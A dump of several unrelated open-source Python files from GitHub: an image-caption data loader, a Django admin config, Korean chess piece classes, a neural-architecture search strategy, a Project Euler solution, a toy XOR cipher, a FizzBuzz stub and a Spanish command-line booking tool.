\n\n\ndef get_path(path='../data/'):\n imgdir = os.path.join(path , 'flickr30k-images')\n cap_path = os.path.join(path , 'dataset.json')\n\n return imgdir , cap_path\n\n\ndef get_train_dev_loader(batch_size , workers):\n imgdir , capdir = get_path()\n\n train_loader = FlickrDataLoader(\n split = 'train',\n root = imgdir,\n json_path = capdir,\n batch_size = batch_size,\n shuffle = True,\n num_workers = workers,\n collate_fn = collate_fn\n )\n \n val_loader = FlickrDataLoader(\n split = 'val',\n root = imgdir,\n json_path = capdir,\n batch_size = batch_size,\n shuffle = False,\n num_workers = workers,\n collate_fn = collate_fn\n )\n\n return train_loader , val_loader\n\n\ndef get_test_loader(batch_size , workers):\n imgdir , capdir = get_path()\n\n test_loader = FlickrDataLoader(\n split = 'test',\n root = imgdir,\n json_path = capdir,\n batch_size = batch_size,\n shuffle = False,\n num_workers = workers,\n collate_fn = collate_fn\n )\n\n return test_loader\n\nif __name__ == \"__main__\":\n train_loader , val_loader = get_train_dev_loader(\n args.batch_size,\n args.workers\n )\n for idx , train_data in enumerate(train_loader):\n images , captions , lengths , _ = train_data\n if idx in [0,1,2,3]:\n print(images , images.shape) # tensor (batch_size , 3 , 224 , 224)\n print(captions) # dict: {input_ids: ... 
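A performance note on the collate_fn in the FlickrDataset record above: it calls AutoFeatureExtractor.from_pretrained and AutoTokenizer.from_pretrained on every batch, re-reading (and on first use, downloading) both checkpoints thousands of times per epoch. Loading them once at module scope keeps the same return signature; a minimal rework, assuming the same two checkpoint names:

from transformers import AutoFeatureExtractor, AutoTokenizer

# Load once at import time instead of once per batch.
IMAGE_PROCESSOR = AutoFeatureExtractor.from_pretrained("facebook/vit-msn-small")
TOKENIZER = AutoTokenizer.from_pretrained("bert-base-uncased")

def collate_fn(data):
    images, captions, ids = zip(*data)
    pixel_values = IMAGE_PROCESSOR(list(images), return_tensors="pt")["pixel_values"]
    lengths = [len(cap.split()) for cap in captions]
    tokens = TOKENIZER(list(captions), padding=True, truncation=True,
                       return_tensors="pt", max_length=max(lengths))
    return pixel_values, tokens, lengths, list(ids)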
, attention_mask: ...}\n print(lengths) # list (batch_size)\n else:\n break\n\n\n\n","repo_name":"xiningin/VSEpp-Text-Image-Retrieve","sub_path":"train/transformer_data_process.py","file_name":"transformer_data_process.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"7105490540","text":"from django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\nfrom . import models\nfrom rooms import models as room_models\n\n\nclass RoomInline(admin.TabularInline):\n model = room_models.Room\n\n\n# Register your models here.\n@admin.register(\n models.User\n) # models.py에서 User 을 가져오는거지. 그래서 CustomUserAdmin class에서 사용하는거여\nclass CustomUserAdmin(UserAdmin): # UserAdmin이 있는 이유는 그냥 장고에서 만들어준 UserAdmin을 상속받은거임.\n\n \"\"\" Custom User Admin\"\"\"\n\n inlines = (RoomInline,)\n # UserAdmin.fieldsets 한 이유는 이게 없으면 Custom Profile 부분만 나오기 때문이다.\n fieldsets = UserAdmin.fieldsets + (\n (\n \"Custom Profile\",\n {\n \"fields\": (\n \"avatar\",\n \"gender\",\n \"bio\",\n \"birthdate\",\n \"language\",\n \"currency\",\n \"superhost\",\n \"login_method\",\n )\n },\n ),\n )\n\n list_filter = UserAdmin.list_filter + (\"superhost\",)\n\n list_display = (\n \"username\",\n \"first_name\",\n \"last_name\",\n \"email\",\n \"is_active\",\n \"language\",\n \"currency\",\n \"superhost\",\n \"is_staff\",\n \"is_superuser\",\n \"email_verified\",\n \"email_secret\",\n \"login_method\",\n )\n\n # list.display , list.filter 함수를 사용하면\n","repo_name":"seongryeol-han/airbnb-clone","sub_path":"users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"69883242660","text":"import board\n\nclass GamePiece:\n \"\"\"\n Parent Class to set standard attributes for Game pieces\n \"\"\"\n\n def __init__(self, player_piece_color):\n \"\"\"\n Parent class to intialize Game piece colors, their type, and a dictionary with alist of diagonal moves\n \"\"\"\n self._color = player_piece_color\n self._piece_type = self.__class__.__name__\n \n def __str__(self):\n \"\"\"\n Dunder method to allow for class string representation for testing purposes\n \"\"\"\n return self.__class__.__name__ + self.get_color()\n\n def get_color(self):\n \"\"\"\n Returns player piece by its color\n \"\"\"\n return self._color\n\n def get_piece_name(self):\n \"\"\"\n returns private piece_type variable\n \"\"\"\n return self._piece_type\n\n def get_diagonal_moves(self, position):\n \"\"\"\n \n \"\"\"\n return self._diagonal_generator(position)\n\n def _diagonal_generator(self, position):\n \"\"\"[summary]\n\n Args:\n position (tuple): [description]\n\n Returns:\n list: array of tuples with x,y matrix coordinates\n \"\"\"\n x,y = position\n deltas = (-1, 1)\n x_positions = [x + i for i in deltas if -1 < x + i < 9]\n y_positions = [y + i for i in deltas if -1 < y + i < 10]\n\n #print(list(x_positions))\n #print(list(y_positions))\n\n for x_pos in x_positions:\n for y_pos in y_positions:\n yield x_pos, y_pos\n\nclass General(GamePiece):\n \"\"\"\n Represents General game piece, inherits from Game Piece class\n \"\"\"\n pass\n\n def __init__(self, _color):\n \"\"\"\n initalizes color from Parent class and list of possible move coordinates\n \"\"\"\n super().__init__(_color)\n self._moves = [(-1, -1), (-1, 0), (-1, 1),\n (0, -1), (0, 0), (0, 1), \n (1, 1), (1, 0), (1, -1), ]\n\n def is_legal_move(self, x_from, y_from, x_to, 
y_to, game_board):\n \"\"\"\n checks that General piece can make attempted move\n returns True if legal, False otherwise\n \"\"\"\n if (x_to, y_to) in board.Board().get_palace(self.get_color()):\n diff = (x_to - x_from, y_to - y_from)\n return diff in self._moves\n else:\n False\n \nclass Guard(GamePiece):\n \"\"\"\n Represents Guard game piece, inherits from Game Piece class\n \"\"\"\n\n def __init__(self, _color):\n \"\"\"\n\n \"\"\"\n super().__init__(_color)\n self._moves = [(-1, -1), (-1, 0), (-1, 1),\n (0, -1), (0, 0), (0, 1), \n (1, 1), (1, 0), (1, -1)]\n\n\n def is_legal_move(self, x_from, y_from, x_to, y_to, game_board):\n \"\"\"\n checks that Guard piece can make attempted move\n returns True if legal, False otherwise\n \"\"\"\n if (x_to, y_to) in board.Board().get_palace(self.get_color()):\n diff = (x_to - x_from, y_to - y_from)\n return diff in self._moves\n else:\n return False\n\n \nclass Horse(GamePiece):\n \"\"\"\n Represents Horse game piece, inherits from Game Piece class\n \"\"\"\n\n def __init__(self, _color):\n \"\"\"\n\n \"\"\"\n super().__init__(_color)\n self._moves = [(-1, -2), (-1, 2), (-2, -1),\n (-2, 1), (0, 0), (1, -2), \n (1, 2), (2, -1), (2, 1)]\n \n def is_legal_move(self, x_from, y_from, x_to, y_to, game_board):\n \"\"\"\n checks that Horse piece can make attempted move\n returns True if legal, False otherwise\n \"\"\"\n\n diff = (x_to - x_from, y_to - y_from)\n return diff in self._moves\n\nclass Elephant(GamePiece):\n \"\"\"\n Represents Elephant game piece, inherits from Game Piece class\n \"\"\"\n\n def __init__(self, _player_piece_color):\n \"\"\"\n\n \"\"\"\n super().__init__(_player_piece_color)\n self._moves = [(-3, -2), (-3, 2), (-2, -3),\n (-2, 3), (0, 0), (2, -3), \n (2, 3), (3, -2), (3, 2)]\n\n\n def is_legal_move(self, x_from, y_from, x_to, y_to, game_game_board):\n \"\"\"\n checks that Horse piece can make attempted move\n returns True if legal, False otherwise\n \"\"\"\n \n diff = (x_to - x_from, y_to - y_from)\n return diff in self._moves\n\nclass Chariot(GamePiece):\n \"\"\"\n Represents Chariot game piece, inherits from GamePiece class\n \"\"\"\n def __init__(self, _color):\n \"\"\"\n\n \"\"\"\n super().__init__(_color)\n\n def is_legal_move(self, x_from, y_from, x_to, y_to, game_game_game_board):\n \"\"\"\n checks that Chariot piece can make attempted move\n returns True if legal, False otherwise\n \"\"\"\n x_step = 1 if x_from < x_to else -1\n y_step = 1 if y_from < y_to else -1\n\n if not (x_from == x_to or y_from == y_to):\n return False\n\n if x_from == x_to:\n col = x_from\n for row in range(y_from + y_step, y_to, y_step):\n if game_game_game_board[col][row] != \"\":\n return False\n\n if y_from == y_to:\n row = y_from\n for col in range(x_from + x_step, x_to, x_step):\n if game_game_game_board[col][row] != \"\":\n return False\n return True\n \n\nclass Cannon(GamePiece):\n \"\"\"\n Represents Cannon game piece, inherits from GamePiece class\n \"\"\"\n def __init__(self, _player_piece_color):\n \"\"\"\n\n \"\"\"\n super().__init__(_player_piece_color)\n\n\n def is_legal_move(self, x_from, y_from, x_to, y_to, game_board):\n \"\"\"\n checks that Cannon piece can make attempted move\n returns True if legal, False otherwise\n \"\"\"\n x_step = 1 if x_from < x_to else -1\n y_step = 1 if y_from < y_to else -1\n\n if not (x_from == x_to or y_from == y_to):\n return False\n\n try:\n if game_board[x_to][y_to].get_piece_name() == \"Cannon\":\n return False\n except AttributeError:\n pass\n \n piece_count = 0\n if x_from == x_to:\n col = 
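Two observations on the piece classes above. First, General.is_legal_move drops the return before False in its else branch, so an off-palace destination falls through and yields None rather than False (Guard gets this right). Second, Chariot and Cannon duplicate the same row/column scan. A hedged sketch of a shared helper, assuming the same board convention of a 2-D list holding piece objects or empty strings:

def pieces_between(board, x_from, y_from, x_to, y_to):
    """Yield pieces strictly between two squares on a shared rank or file."""
    if x_from != x_to and y_from != y_to:
        raise ValueError("not a straight-line move")
    x_step = (x_to > x_from) - (x_to < x_from)   # -1, 0, or +1
    y_step = (y_to > y_from) - (y_to < y_from)
    x, y = x_from + x_step, y_from + y_step
    while (x, y) != (x_to, y_to):
        if board[x][y] != "":
            yield board[x][y]
        x, y = x + x_step, y + y_step

A Chariot move is then legal when the generator yields nothing; a Cannon capture needs exactly one screen piece, and the code above additionally rejects a Cannon as either the screen or the capture target.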
x_from\n for row in range(y_from + y_step, y_to, y_step):\n if game_board[col][row] != \"\":\n piece_count += 1\n if piece_count > 1:\n return False\n if game_board[col][row].get_piece_name() == \"Cannon\":\n return False\n\n if y_from == y_to:\n row = y_from\n for col in range(x_from + x_step, x_to, x_step):\n if game_board[col][row] != \"\":\n piece_count += 1\n if piece_count > 1:\n return False\n if game_board[col][row].get_piece_name() == \"Cannon\":\n return False\n if piece_count == 0:\n return False\n return True\n\nclass Soldier(GamePiece):\n \"\"\"\n Represents Soldier game piece, inherits from GamePiece class\n \"\"\"\n\n def __init__(self, _player_piece_color):\n \"\"\"\n\n \"\"\"\n super().__init__(_player_piece_color)\n if self.get_color() == \"BLUE\":\n self._moves = [(-1, 0), (0, -1), (0, 0), (0, 1)] # for Blue\n\n elif self.get_color() == \"RED\":\n self._moves = [(1, 0), (0, -1), (0, 0), (0, 1)] # for Red\n\n def is_legal_move(self, x_from, y_from, x_to, y_to, game_board):\n \"\"\"\n checks that Soldier piece can make attempted move\n returns True if legal, False otherwise\n \"\"\"\n diff = (x_to - x_from, y_to - y_from)\n return diff in self._moves","repo_name":"branhoff/python_class_102","sub_path":"IDE_exercises/solutions/project-09/GamePiece.py","file_name":"GamePiece.py","file_ext":"py","file_size_in_byte":7774,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"2415946168","text":"\"\"\"\nFile containing MLPChromosome class:\n MLPChromosome represents the architecture of an MLP network, including fully connected layer\n and parameter genes\n\"\"\"\nfrom __future__ import annotations\nimport itertools\nfrom typing import Union, List\n\nimport tensorflow as tf\n\nfrom revolve.grids import MLPParameterGrid\nfrom revolve.architectures.genes import FCGene, ParameterGene\nfrom revolve.architectures.chromosomes import MLPChromosome\nfrom revolve.architectures.base import BaseStrategy\n\n\nclass MLPStrategy(BaseStrategy):\n \"\"\"\n Strategy class for handling MLP chromosomes. This strategy is responsible for\n generating a population of MLPChromosomes, and checking if a chromosome is a valid architecture.\n\n Args:\n parameters (dataclass): Dataclass containing learnable parameters.\n max_fc (int, optional): Maximum number of fully connected layers. Defaults to 3.\n epochs (int, optional): Number of epochs for training. Defaults to 100.\n callback (tf.keras.callbacks.Callback, optional): Keras Callback object. 
Defaults to None.\n loss (Union[tf.keras.losses.Loss, str], optional): Loss function.\n Defaults to tf.keras.losses.MeanSquaredError().\n metric (Union[tf.keras.metrics.Metric, str], optional): Metric for evaluation.\n Defaults to tf.keras.metrics.MeanAbsoluteError().\n\n \"\"\"\n\n def __init__( # pylint: disable=too-many-arguments\n self,\n parameters: type[MLPParameterGrid],\n max_fc: int = 3,\n squeeze_fc: bool = False,\n epochs: int = 100,\n callback: tf.keras.callbacks.Callback = None,\n loss: Union[tf.keras.losses.Loss, str] = tf.keras.losses.MeanSquaredError(),\n metric: Union[\n tf.keras.metrics.Metric, str\n ] = tf.keras.metrics.MeanAbsoluteError(),\n ):\n self.max_fc = max_fc\n self.squeeze_fc = squeeze_fc\n self.epochs = epochs\n self.callback = callback\n\n if isinstance(loss, str):\n self.loss = tf.keras.losses.get(loss)\n else:\n self.loss = loss\n\n if isinstance(metric, str):\n self.metric = tf.keras.metrics.get(metric)\n else:\n self.metric = metric\n\n self.parameters = parameters # self.get_learnable_parameters()\n\n @staticmethod\n def create_new_chromosome(genes: List[Union[FCGene, ParameterGene]]):\n \"\"\"\n Create a new MLPChromosome from a list of genes.\n\n Args:\n genes (List[Union[FCGene, ParameterGene]]): List of genes to be used for\n creating the chromosome.\n\n Returns:\n MLPChromosome: A new MLPChromosome.\n \"\"\"\n return MLPChromosome(genes=genes)\n\n def generate_population(self, population_size: int) -> List:\n \"\"\"\n Generate a population of chromosomes with unique architectures.\n\n Parameters:\n population_size (int): The size of the population to generate.\n\n Returns:\n List: The generated population of chromosomes.\n \"\"\"\n assert isinstance(population_size, int)\n\n population: List[MLPChromosome] = []\n\n key_store: List[str] = []\n\n while len(population) < population_size:\n fc_block = self.fc_block(self.parameters, FCGene, max_fc=self.max_fc)\n\n if self.squeeze_fc:\n fc_block = self.squeeze_fc_neurons(fc_block)\n\n parameter_block = self.parameter_block(self.parameters, gene=ParameterGene)\n\n genes = list(itertools.chain(fc_block, parameter_block))\n\n chromosome = self.create_new_chromosome(genes)\n\n key = chromosome.get_unique_key(chromosome.genes)\n\n if key not in key_store:\n if self.check_valid_architecture(\n chromosome, \"hidden_neurons\"\n ) and self.check_first_layer(chromosome, \"hidden_neurons\"):\n population.append(chromosome)\n key_store.append(key)\n\n return population\n","repo_name":"ThePopeLabs/REvolve","sub_path":"revolve/architectures/strategies/mlp_strategy.py","file_name":"mlp_strategy.py","file_ext":"py","file_size_in_byte":4008,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"1281992814","text":"import sys\n\n\"\"\"\nSolve p = a^2 + b^2 where p is a prime and p = 1 (mod 4)\n\"\"\"\nclass HermiteSerretAlgorithm():\n def get(self, prime):\n if prime % 4 != 1:\n raise ValueError\n x = self.__find_x(prime)\n return self.__apply_brillhart_method(prime, x)\n\n def __find_x(self, prime):\n half_prime = (prime - 1) // 2\n for a in range(1, half_prime + 1):\n if pow(a, half_prime, prime) == prime - 1:\n return pow(a, (prime - 1) // 4, prime)\n raise ValueError\n\n def __apply_brillhart_method(self, prime, x):\n if prime % x == 1:\n return (1, x)\n a, b = prime, x\n while b != 0:\n r = a % b\n if r * r < prime:\n return (b % r, r)\n a, b = b, r\n raise ValueError\n\n\"\"\"\n(a^2 + b^2)(c^2 + d^2) = (ac + bd)^2 + (ad - bc)^2 = (ac - bd)^2 + (ad + 
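The 360.py record beginning above pairs Hermite-Serret with Brillhart's Euclidean shortcut to split a prime p = 1 (mod 4) into two squares. As a sanity check of the idea, here is a self-contained sketch, independent of the classes: find x with x^2 = -1 (mod p) from any quadratic non-residue, then run Euclid on (p, x) and stop at the first remainder below sqrt(p). For p = 13, x = 5 works and the descent yields 13 = 2^2 + 3^2.

def two_squares_prime(p):
    """Write a prime p with p % 4 == 1 as a sum of two squares."""
    # Euler's criterion: a is a non-residue iff a^((p-1)/2) = -1 (mod p).
    for a in range(2, p):
        if pow(a, (p - 1) // 2, p) == p - 1:
            x = pow(a, (p - 1) // 4, p)   # then x^2 = -1 (mod p)
            break
    a, b = p, x
    while b * b > p:                      # descend until b < sqrt(p)
        a, b = b, a % b
    return (a % b, b)

assert sorted(two_squares_prime(13)) == [2, 3]   # 13 = 2^2 + 3^2
assert sorted(two_squares_prime(97)) == [4, 9]   # 97 = 4^2 + 9^2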
bc)^2\n\"\"\"\nclass BrahmaguptaFibonacciIdentity():\n def get_one_list_and_another_list(self, one_list, another_list):\n result = set()\n for one in one_list:\n for another in another_list:\n result |= self.get_one_and_another(one, another)\n return result\n\n def get_one_and_another_list(self, one, another_list):\n result = set()\n for another in another_list:\n result |= self.get_one_and_another(one, another)\n return result\n\n def get_one_list_and_another(self, one_list, another):\n result = set()\n for one in one_list:\n result |= self.get_one_and_another(one, another)\n return result\n\n def get_one_and_another(self, one, another):\n result = set()\n a, b = one\n c, d = another\n x, y = abs(a * c - b * d), a * d + b * c\n if x > y:\n result.add((y, x))\n else:\n result.add((x, y))\n x, y = a * c + b * d, abs(a * d - b * c)\n if x > y:\n result.add((y, x))\n else:\n result.add((x, y))\n return result\n\nclass FactorizationAlgorithm():\n def __init__(self, n):\n self.values = self.__get_values(n)\n\n def __get_values(self, n):\n values = [{} for i in range(n + 1)]\n for i in range(2, n + 1):\n if values[i]:\n continue\n for j in range(i, n + 1, i):\n values[j][i] = 1\n d = i * i\n while d <= n:\n for j in range(d, n + 1, d):\n values[j][i] += 1\n d *= i\n return values\n\n \"\"\"\n Get the factorization of a * b.\n \"\"\"\n def get(self, a, b):\n result = {}\n for p in self.values[a]:\n result[p] = self.values[a][p]\n for q in self.values[b]:\n if q not in result:\n result[q] = 0\n result[q] += self.values[b][q]\n return result\n\n\"\"\"\nSolve n = a^2 + b^2.\n\"\"\"\nclass SumsOfTwoSquaresAlgorithm():\n def __init__(self):\n self.one_sum_pair = (0, 1)\n self.two_sum_pair = (1, 1)\n self.hermite_serret_algorithm = HermiteSerretAlgorithm()\n self.brahmagupta_fibonacci_identity = BrahmaguptaFibonacciIdentity()\n self.solution_cache = {}\n\n def get(self, factorization):\n result = set()\n if not self.__has_solution(factorization):\n return result\n \n result.add(self.one_sum_pair)\n scalar = 1\n for p in factorization:\n e = factorization[p]\n if p == 2:\n if e % 2 == 1:\n result = self.brahmagupta_fibonacci_identity.get_one_list_and_another(result, self.two_sum_pair)\n scalar *= p**(e // 2)\n elif p % 4 == 3:\n scalar *= p**(e // 2)\n else:\n prime_factor_solution = self.__get_prime_factor_solution(p, e)\n result = self.brahmagupta_fibonacci_identity.get_one_list_and_another_list(result, prime_factor_solution)\n return self.__multiply_scalar(result, scalar)\n\n def __has_solution(self, factorization):\n for p in factorization:\n e = factorization[p]\n if p % 4 == 3 and e % 2 == 1:\n return False\n return True\n\n def __get_prime_factor_solution(self, p, e):\n n = pow(p, e)\n if n not in self.solution_cache:\n result = set()\n primitive_pair = self.hermite_serret_algorithm.get(p)\n result.add(primitive_pair)\n for i in range(2, e + 1):\n result = self.brahmagupta_fibonacci_identity.get_one_list_and_another(result, primitive_pair)\n self.solution_cache[n] = result\n return self.solution_cache[n]\n\n def __multiply_scalar(self, solution, scalar):\n result = set()\n for x, y in solution:\n result.add((x * scalar, y * scalar))\n return result\n\nclass Problem():\n def solve(self):\n print(self.get(10**10))\n\n def get(self, n):\n a, t = self.__decompose(n)\n factorization_algorithm = FactorizationAlgorithm(2 * t)\n sums_of_two_squares_algorithm = SumsOfTwoSquaresAlgorithm()\n\n total_distance = 0\n # Case 1: x = 0\n factorization = factorization_algorithm.get(t + 0, t - 0)\n solution = 
sums_of_two_squares_algorithm.get(factorization)\n for y, z in solution:\n symmetric_count = self.__get_symmetric_count(y, z)\n manhattan_distance = y + z\n total_distance += manhattan_distance * symmetric_count\n\n # Case 2: x = 1 to t - 1\n for x in range(1, t):\n factorization = factorization_algorithm.get(t + x, t - x)\n solution = sums_of_two_squares_algorithm.get(factorization)\n for y, z in solution:\n symmetric_count = 2 * self.__get_symmetric_count(y, z) # +x and -x\n manhattan_distance = x + y + z\n total_distance += manhattan_distance * symmetric_count\n\n # Case 3: x = t. Then y = 0, z = 0, symmetric_count = 2 (+t and -t)\n total_distance += t * 2\n\n return total_distance * 2**a\n\n \"\"\"\n Write n = 2^a t where t is odd\n \"\"\"\n def __decompose(self, n):\n a = 0\n d = n\n while d % 2 == 0:\n a += 1\n d //= 2\n return a, d\n\n def __get_symmetric_count(self, a, b):\n count = 1\n if a != 0:\n count *= 2\n if b != 0:\n count *= 2\n if a != b:\n count *= 2\n return count\n\ndef main():\n problem = Problem()\n problem.solve()\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"torehc/ProjectEuler","sub_path":"360.py","file_name":"360.py","file_ext":"py","file_size_in_byte":6602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"35730073748","text":"#Реализовать программу симметричного шифрования вводимой строки,\n#используя гаммирование по алгоритму Вернона (ключ — случайная двоичная последовательность).\n\nimport random\ns = str(input())\nletters = \"абвгдежзийклмнопрстуфхцчшщъыьэюя\"\nkey = random.randint(0, 63)\nword = \"\"\n\nfor i in s:\n let = bin(letters.index(i)^key)[2:]\n while len(let) < 6:\n let = \"0\" + let\n word += let\n\nprint(\"Ключ - \", key)\nprint(word)\n","repo_name":"Exiti228/infobez","sub_path":"task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34514626844","text":"import click\nimport sys\n\n\ndef is_positive_integer(n):\n \"\"\"Returns True if n is a positive integer\"\"\"\n\n\n return False\n\n\ndef process(n):\n \"\"\"Returns the string representation of integer n unless:\n - n is evenly divisible by 3 (returns 'Fizz')\n - n is evenly divisible by 5 (returns 'Buzz')\n - n is evenly divisible by both 3 and 5 (returns 'FizzBuzz')\"\"\"\n\n return ''\n\n\n@click.command()\n@click.option('-n', default=100, help='A positive integer')\ndef main(n):\n\n # Validate input\n if not is_positive_integer(n):\n print(\"the value of n must be a positive, non-zero integer\")\n sys.exit()\n\n # Iterate from 1 to n inclusive and print FizzBuzz\n for i in range(1, n+1):\n print(process(i))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"cherdt/fizzbuzz","sub_path":"fizzbuzz/fizzbuzz.py","file_name":"fizzbuzz.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"40377358104","text":"from prettytable import PrettyTable\nfrom Logic.Logic_ExperienciaResidenciaLogic import ExperienciaResidenciaLogic\nfrom Logic.Logic_ExperienciasLogic import ExperienciaLogic\nfrom Logic.Logic_TematicaLogic import TematicaLogic\nfrom Views.View_Tematica import TematicaBE\n\nclass organizarExperienciaBE:\n def __init__(self):\n self.dbexperiencia = ExperienciaLogic()\n self.dbexperienciaresidencia = ExperienciaResidenciaLogic()\n self.dbtematica =TematicaLogic()\n self.betematica = 
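The task1.py record above (its Russian header asks for symmetric encryption of an input string via Vernam-style gamming with a random binary key) prints only the ciphertext, six bits per letter. Because XOR is an involution, (i ^ key) ^ key == i, the same key decrypts; a matching decoder sketch, assuming the same 32-letter alphabet and 6-bit groups:

letters = "абвгдежзийклмнопрстуфхцчшщъыьэюя"

def decrypt(bits: str, key: int) -> str:
    # Split the stream back into the 6-bit groups the encoder emitted,
    # then XOR each group with the key to recover the alphabet index.
    chunks = [bits[i:i + 6] for i in range(0, len(bits), 6)]
    return "".join(letters[int(chunk, 2) ^ key] for chunk in chunks)

Strictly speaking, one 6-bit key reused for every letter is a repeating-key XOR rather than a true Vernam one-time pad, which would need fresh random bits for the whole message.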
TematicaBE()\n \n #INGRESO DE DATOS\n def addOrganizarExperiencia(self):\n self.addExperiencia()\n\n def addExperiencia(self):\n print(\"\\nAdding a new experiencia...\")\n host = input(\"\\nNombre del anfitrion: \")\n ExperienceTitle = input(\"\\nTítulo experiencia: \")\n TypeExperience =int(input(\"\\nTipo de experiencia (0-Online||1-Presencial): \"))\n\n if TypeExperience==0:\n TypeExperience= 0\n Location=input(\"\\nPlataforma (Meets|Zoom|Teams|Otro): \")\n description = input(\"Descripción de la experiencia: \")\n Idiom=input(\"\\nIdioma : \")\n PublicObject = input(\"Publico objetivo: \")\n Organization = input(\"Organizacion: \")\n hostExperience = input(\"Experiencia del anfitrion(Basico|Medio|Experto): \")\n NeedElements = input(\"Elementos faltantes: \")\n PrecioIndividual = round(float(input(\"Precio Individual($0.00): \")),2)\n strFecha = input(\"\\nFecha (yyyy-mm-dd): \")\n strHora = input(\"\\nHora (hh:mm:ss): \")\n self.ordenarTematica()\n\n idTematic = int(input(\"¿La tematica se encuentra en las opciones?(1-Sí||0-No): \"))\n if idTematic==1:\n idTematic=input(\"Ingrese el id de la tematica: \")\n\n elif idTematic==0:\n idTematic = self.betematica.addTematicaProceso()\n\n strFechaCompleta = strFecha+\" \"+strHora\n\n elif TypeExperience==1:\n TypeExperience = 1\n Location=input(\"Ubicación: \")\n Idiom=input(\"Idioma : \")\n description = input(\"Descripción de la experiencia: \")\n PublicObject = input(\"Publico objetivo: \")\n Organization = input(\"Organizacion: \")\n hostExperience = input(\"Experiencia del anfitrion(Basico|Medio|Experto): \")\n NeedElements = input(\"Elementos faltantes: \")\n PrecioIndividual = round(float(input(\"Precio Individual($0.00): \")),2)\n strFecha = input(\"Fecha (yyyy-mm-dd): \")\n strHora = input(\"Hora (hh:mm:ss): \")\n self.ordenarTematica()\n idTematic = int(input(\"¿La tematica se encuentra en las opciones?(1-Sí||0-No): \"))\n if idTematic==1:\n idTematic=input(\"Ingrese el id de la tematica: \")\n\n elif idTematic==0:\n idTematic = self.betematica.addTematicaProceso()\n\n strFechaCompleta = strFecha+\" \"+strHora\n\n else:\n TypeExperience= 0\n Location=input(\"Plataforma (1.Meets|2.Zoom|3.Teams|4.Otro): \")\n Idiom=input(\"Idioma : \")\n description = input(\"Descripción de la experiencia: \")\n PublicObject = input(\"Publico objetivo: \")\n Organization = input(\"Organizacion: \")\n hostExperience = input(\"Experiencia del anfitrion(Basico|Medio|Experto): \")\n NeedElements = input(\"Elementos faltantes: \")\n PrecioIndividual = round(float(input(\"Precio Individual($0.00): \")),2)\n strFecha = input(\"Fecha (yyyy-mm-dd): \")\n strHora = input(\"Hora (hh:mm:ss): \")\n self.ordenarTematica()\n idTematic = int(input(\"¿La tematica se encuentra en las opciones?(1-Sí||0-No): \"))\n if idTematic==1:\n idTematic=input(\"Ingrese el id de la tematica: \")\n strFechaCompleta = strFecha+\" \"+strHora\n elif idTematic==0:\n idTematic= self.dbtematica.insertTematica()\n strFechaCompleta = strFecha+\" \"+strHora\n\n self.dbexperiencia.insertExperiencia(host,ExperienceTitle,TypeExperience,Location,\n description, Idiom,PublicObject,Organization,hostExperience,NeedElements,PrecioIndividual,\n strFechaCompleta,idTematic)\n\n idexperiencia=self.dbexperiencia.traerIDExperiencia(host,ExperienceTitle,TypeExperience,\n Location, description, Idiom,PublicObject,Organization,hostExperience,NeedElements,PrecioIndividual,\n strFechaCompleta,idTematic)\n \n print(\"\\nSu experiencia se ha creado con éxito.\\n\")\n print(f\"Su código de experiencia único es 
{idexperiencia}.\\n\")\n \n #UPDATES\n def updateOrdenarExperiencia(self):\n self.updateExperiencia()\n\n def updateExperiencia(self):\n print(\"\\nUpdating an existing experiencia...\")\n id = int(input(\"\\nID de la experiencia a actualizar: \"))\n\n experiencia = self.dbexperiencia.searchExperienciaById(id)\n\n update = int(input(\"¿Actualizar el anfitrion? 0-No - 1-Yes: \"))\n if update == 1:\n print(f\"Anfitrion antigÜo : {experiencia.host}\")\n host = input(\"Nuevo anfitrion: \")\n else:\n host = experiencia.host\n\n update = int(input(\"¿Actualizar el titulo de la experiencia? 0-No - 1-Yes: \"))\n if update == 1:\n print(f\"Antigüo titulo de la experiencia: {experiencia.ExperienceTitle}\")\n ExperienceTitle = input(\"Nuevo titulo de experiencia: \")\n else:\n ExperienceTitle = experiencia.ExperienceTitle\n\n update = int(input(\"¿Actualizar el tipo de experiencia? 0-No - 1-Yes: \"))\n if update == 1:\n print(f\"Antigüo tipo de experiencia: {experiencia.TypeExperience}\")\n TypeExperience = input(\"Nuevo tipo de experiencia: \")\n else:\n TypeExperience = experiencia.TypeExperience\n\n update = int(input(\"¿Actualizar la ubicacion? 0-No - 1-Yes: \"))\n if update == 1:\n print(f\"Antigüa ubicacion: {experiencia.Location}\")\n Location = input(\"Nueva ubicacion: \")\n else:\n Location = experiencia.Location\n\n update = int(input(\"¿Actualizar la descripción? 0-No - 1-Yes: \"))\n if update == 1:\n print(f\"Antigüa descripción: {experiencia.Descrption}\")\n Descrption = input(\"Nueva descripción: \")\n else:\n Descrption = experiencia.Descrption\n\n update = int(input(\"¿Actualizar el idioma? 0-No - 1-Yes: \"))\n if update == 1:\n print(f\"Antigüo idioma: {experiencia.Idiom}\")\n Idiom = input(\"Nuevo idioma: \")\n else:\n Idiom = experiencia.Idiom\n\n update = int(input(\"¿Actualizar el publico objetivo? 0-No - 1-Yes: \"))\n if update == 1:\n print(f\"Antigüo publico objetivo: {experiencia.PublicObject}\")\n PublicObject = input(\"Nuevo publico objetivo: \")\n else:\n PublicObject = experiencia.PublicObject\n\n update = int(input(\"¿Actualizar la organización? 0-No - 1-Yes: \"))\n if update == 1:\n print(f\"Antigüa organización: {experiencia.Organization}\")\n Organization = input(\"Nueva organización: \")\n else:\n Organization = experiencia.Organization\n\n update = int(input(\"¿Actualizar la experiencia del anfitrion? 0-No - 1-Yes: \"))\n if update == 1:\n print(f\"Antigüa 